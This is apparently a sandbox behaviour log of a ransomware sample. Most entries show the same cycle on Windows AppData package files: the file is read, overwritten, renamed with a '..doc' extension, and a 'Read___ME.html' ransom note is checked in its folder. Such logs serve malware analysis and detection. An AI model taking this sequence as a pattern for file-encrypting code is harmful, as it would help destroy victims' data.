File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\ActivationStore.dat.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Windows.PurchaseDialog_6.2.0.0_neutral_neutral_cw5n1h2txyewy\ActivationStore\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\roaming.lock..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PurchaseDialog_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\roaming.lock..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\roaming.lock..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\settings.dat.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Windows.MiracastView_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\roaming.lock..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, type = size, size_out = 896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 8192, size_out = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 896	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG2..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, type = size, size_out = 949	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 8192, size_out = 949	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 960	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, type = size, size_out = 1041	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 8192, size_out = 1041	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 1056	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{33C56305-BA7B-48E0-9784-2D05E3F5D27E}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, type = size, size_out = 1011	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 8192, size_out = 1011	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 1024	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, destination_filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, type = size, size_out = 991	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 8192, size_out = 991	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 992	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, size = 768	1	Fn Data
